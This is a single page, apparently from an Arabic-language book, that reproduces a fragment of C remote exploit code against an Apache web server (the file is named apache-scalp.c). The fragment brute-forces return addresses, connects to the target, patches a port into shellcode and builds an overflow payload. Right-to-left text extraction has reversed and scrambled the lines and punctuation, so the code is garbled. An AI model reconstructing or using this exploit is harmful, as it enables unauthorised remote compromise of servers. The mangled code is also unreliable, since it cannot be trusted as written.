Page 294 - بسم الله الرحمن الرحيم
P. 294
;(signal(SIGPIPE, SIG_IGN
} (for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC
/* skip invalid return adresses */
;i = retaddr & 0xff
(if(i == 0x0a || i == 0x0d
;++retaddr
((else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4
;continue
;(sock = socket(AF_INET, SOCK_STREAM, 0
;sin.sin_family = AF_INET
;(sin.sin_addr.s_addr = inet_addr(hostp
;((sin.sin_port = htons(atoi(portp
(if(!progress
;("\\\ ..printf(\\\"\\\\n[*] Connecting
;(fflush(stdout
} (if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
/* Setup the local port in our shellcode */
;(i = sizeof(from
} (if(getsockname(sock, (struct sockaddr *) & from, &i) != 0
;("\\\()perror(\\\"getsockname
;(exit(1
{
;(lport = ntohs(from.sin_port
;shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff
;shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff
p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *
(REP_SHELLCODE
PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *)) +
;((REP_POPULATOR
;("\\\PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n
} (++for (i = 0; i < REP_SHELLCODE; i
;("\\\-PUT_STRING(\\\"X
;(PUT_BYTES(PADSIZE_3, PADDING_3
294
